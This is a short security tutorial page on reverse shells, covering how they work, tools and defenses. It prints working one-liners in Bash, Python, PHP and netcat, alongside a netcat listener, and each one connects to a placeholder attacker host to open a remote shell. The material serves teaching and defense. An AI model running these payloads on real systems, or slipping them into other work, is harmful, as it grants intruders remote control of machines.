Views

Getting Reverse Shells

1 Global Definition

A Reverse Shell is a method used by attackers to gain remote access to a compromised machine. Instead of the attacker connecting directly to the target, the target initiates the connection to the attacker’s machine, bypassing restrictions like firewalls and NAT.

1.1 Key Concepts

  • Shell: A command-line interface that allows users (or attackers) to execute commands on a system.
  • Listener: The attacker’s system waits for incoming connections on a specific port.
  • Payload: The malicious code injected into the target that forces it to connect back.
  • NAT Bypass: Since outbound connections are usually allowed, reverse shells help bypass restrictions where inbound connections are blocked.

1.2 How Reverse Shells Work

1. The attacker sets up a listener on their machine. 2. The attacker delivers a payload (via exploit, phishing, file upload, etc.) to the victim. 3. The payload forces the victim machine to connect back to the attacker’s IP and port. 4. The attacker gains an interactive shell session on the victim system.


      # Attacker side (listener)
      nc -lvnp 4444  

      # Victim payload (reverse shell)
      bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
    

1.3 Common Reverse Shell Payloads

  • Bash: bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
  • Python: python -c 'import socket,os,pty; s=socket.socket(); s.connect(("ATTACKER_IP",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn("/bin/sh")'
  • PHP: system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'");
  • Netcat (nc): nc -e /bin/sh ATTACKER_IP 4444
  • PowerShell (Windows): Reverse shell using TCP sockets.

1.4 Reverse Shell vs Bind Shell

- Reverse Shell: Victim connects back to attacker (bypasses firewalls). - Bind Shell: Victim opens a port and attacker connects directly.

Reverse shells are preferred in real-world attacks because outbound connections are often allowed, while inbound ports are usually blocked by firewalls.

1.5 Tools for Reverse Shells

  • Netcat (nc): The classic tool for setting up listeners and simple shells.
  • Metasploit: Generates and handles advanced reverse shells with automation.
  • Socat: More reliable and feature-rich than netcat (supports encrypted shells).
  • Nishang: A collection of PowerShell reverse shell scripts.
  • MSFVenom: Payload generator to craft platform-specific reverse shells.

1.6 Defense Mechanisms

  • Monitor unusual outbound traffic with IDS and firewalls.
  • Restrict outbound connections to only trusted IPs and services.
  • Use application whitelisting to block unauthorized binaries/scripts.
  • Enable endpoint detection and response (EDR) tools to catch suspicious processes.
  • Conduct regular penetration testing to identify potential reverse shell vectors.

1.7 Why It Matters

Reverse shells are one of the most common post-exploitation techniques. Mastering them is critical for both attackers (in red teaming & penetration testing) and defenders (blue teams monitoring for intrusions).

Share and Join the Discussion

You need to be logged in to participate in this discussion.

×
×